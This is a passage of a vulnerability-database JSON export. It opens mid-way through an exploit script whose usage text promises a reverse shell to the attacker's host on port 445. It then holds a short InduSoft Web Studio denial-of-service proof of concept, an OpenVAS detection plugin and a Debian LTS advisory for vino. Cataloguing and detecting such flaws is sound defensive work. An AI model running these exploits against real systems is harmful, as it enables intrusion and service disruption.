= time.time() + timeout\r\n responses = []\r\n\r\n while True:\r\n if time.time() > timeout:\r\n break\r\n try:\r\n response = s.recvfrom(1024)\r\n print(response)\r\n responses.append(response)\r\n sendFuzzingUDPBroadcast(ip=ip)\r\n response = s.recvfrom(1024) \r\n except socket.timeout:\r\n print(\"[!] Error with UDP server\")\r\n\r\n s.close()\r\n return responses\r\n\r\nnargs = len(sys.argv)\r\n\r\nif nargs < 2:\r\n print(\"[*] Usage: python3 %s <network_interface> [<ip>]\\n\\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445\")\r\n sys.exit(0)\r\n\r\nsetFuzzUDPServer()\n\n# 0day.today [2019-12-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33614"}, {"lastseen": "2019-12-04T01:58:54", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-11-27T00:00:00", "published": "2019-11-27T00:00:00", "id": "1337DAY-ID-33593", "href": "https://0day.today/exploit/description/33593", "title": "InduSoft Web Studio 8.1 SP1 - (Atributos) Denial of Service Exploit", "type": "zdt", "sourceData": "# Exploit Title: InduSoft Web Studio 8.1 SP1 - \"Atributos\" Denial of Service (PoC)\r\n# Discovery by: chuyreds\r\n# Vendor Homepage: http://www.indusoft.com/\r\n# Software Link : http://www.indusoft.com/Products-Downloads\r\n# Tested Version: 8.1 SP1\r\n# Vulnerability Type: Denial of Service (DoS) Local\r\n# Tested on OS: Windows 10 Pro x64 es\r\n\r\n# Exploit Title: InduSoft Web Studio 8.1 SP1 - \"Atributos\" 'No Redibujar'/'Deshabilitados' Denial of Service (PoC)\r\n# Discovery by: chuyreds\r\n# Google Dork: [email\u00a0protected]: chuyreds\r\n# Discovery Date: 23-11-2019\r\n# Vendor Homepage: http://www.indusoft.com/\r\n# Software Link : http://www.indusoft.com/Products-Downloads\r\n# Tested Version: 8.1 SP1\r\n# Vulnerability Type: Denial of Service (DoS) Local\r\n# Tested on OS: Windows 10 Pro x64 es\r\n\r\n# Steps to Produce the Denial of Service: \r\n# 1.- Run python code: InduSoft Web Studio Edition 8.1 SP1.py\r\n# 2.- Open InduSoft \"Web Studio Edition 8.1 SP1.txt\" and copy content to clipboard\r\n# 3.- Open InduSoft Web Studio Edition 8.1 SP1\r\n# 4.- On Graficos slect Atributos\r\n# 5.- Paste ClipBoard on \"No Redibujar\"/\"Deshabilitados\" and click on \"Aceptar\"\r\n\r\n\r\n#!/usr/bin/env python\r\n\r\nbuffer = \"\\x41\" * 1026\r\nf = open (\"InduSoft Web Studio Edition 8.1 SP1.txt\", \"w\")\r\nf.write(buffer)\r\nf.close()\n\n# 0day.today [2019-12-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33593"}], "openvas": [{"lastseen": "2019-12-04T15:52:38", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-11-30T00:00:00", "published": "2019-11-30T00:00:00", "id": "OPENVAS:1361412562310892014", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892014", "title": "Debian LTS Advisory ([SECURITY] [DLA 2014-1] vino security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892014\");\n script_version(\"2019-11-30T03:00:09+0000\");\n script_cve_id(\"CVE-2014-6053\", \"CVE-2018-7225\", \"CVE-2019-15681\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-30 03:00:09 +0000 (Sat, 30 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-30 03:00:09 +0000 (Sat, 30 Nov 2019)\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 2014-1] vino security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/11/msg00032.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-2014-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/945784\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'vino'\n package(s) announced via the DSA-2014-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been identified in the VNC code of vino, a\ndesktop sharing utility for the GNOME desktop environment.\n\nThe vulnerabilities referenced below are issues that have originally been\nreported against Debian source package libvncserver. The vino source\npackage in Debian ships a custom-patched and stripped down variant of\nlibvncserver, thus some of libvncserver's security fixes required porting\nover.\n\nCVE-2014-6053\n\nThe rfbProcessClientNormalMessage function in\nlibvncserver/rfbserver.c in LibVNCServer did not properly handle\nattempts to send a large amount of ClientCutText data, which allowed\nremote attackers to cause a denial of service (memory consumption or\ndaemon crash) via a crafted message that was processed by using a\nsingle unchecked malloc.\n\nCVE-2018-7225\n\nAn issue was discovered in LibVNCServer.\nrfbProcessClientNormalMessage() in rfbserver.c did not sanitize\nmsg.cct.length, leading to access to uninitialized and potentially\nsensitive data or possibly unspecified other impact (e.g., an integer\noverflow) via specially crafted VNC packets.\n\nCVE-2019-15681\n\nLibVNC contained a memory leak (CWE-655) in VNC server code, which\nallowed an attacker to read stack memory and could be abused for\ninformation disclosure. Combined with another vulnerability, it could\nbe used to leak stack memory and bypass ASLR. This attack appeared to\nbe exploitable via network connectivity.\");\n\n script_tag(name:\"affected\", value:\"'vino' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n3.14.0-2+deb8u1.\n\nWe recommend that you upgrade your vino packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"vino\", ver:\"3.14.0-2+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-11-29T22:14:35", "bulletinFamily": "unix", "description": "Package : vino\nVersion : 3.14.0-2+deb8u1\nCVE ID : CVE-2014-6053 CVE-2018-7225 CVE-2019-15681\nDebian Bug : 945784\n\n\nSeveral vulnerabilities have been identified in the VNC code of vino, a\ndesktop sharing utility for the GNOME desktop environment.\n\nThe vulnerabilities referenced below are issues that have originally been\nreported against Debian source package libvncserver. The vino source\npackage in Debian ships a custom-patched and stripped down variant of\nlibvncserver, thus some of libvncserver's security fixes required porting\nover.\n\nCVE-2014-6053\n\n The rfbProcessClientNormalMessage function in\n libvncserver/rfbserver.c in LibVNCServer did not properly handle\n attempts to send a large amount of ClientCutText data, which allowed\n remote attackers to cause a denial of service (memory consumption or\n daemon crash) via a crafted message that was processed by using a\n single unchecked malloc.\n\nCVE-2018-7225\n\n An issue was discovered in LibVNCServer.\n rfbProcessClientNormalMessage() in rfbserver.c did not sanitize\n msg.cct.length, leading to access to uninitialized and potentially\n sensitive data or possibly unspecified other impact (e.g., an integer\n overflow) via specially crafted VNC packets.\n\nCVE-2019-15681\n\n LibVNC contained a memory leak (CWE-655) in VNC server code, which\n allowed an attacker to read stack memory and could be abused for\n information disclosure. Combined with another vulnerability, it could\n be used to leak stack memory and bypass ASLR. This attack appeared to\n be exploitable via network connectivity.\n\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n3.14.0-2+deb8u1.\n\nWe recommend that you upgrade your vino packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \n\nmike gabriel aka sunweaver (Debian Developer)\nfon: +49 (1520) 1976 148\n\nGnuPG Fingerprint: 9BFB AEE8 6C0A A5FF BF22 0782 9AF4 6B30 2577 1B31\nmail: sunweaver@debian.org, http://sunweavers.net\n", "modified": "2019-11-29T08:31:28", "published": "2019-11-29T08:31:28", "id": "DEBIAN:DLA-2014-1:AEDFD", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201911/msg00032.html", "title": "[SECURITY] [DLA 2014-1] vino security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
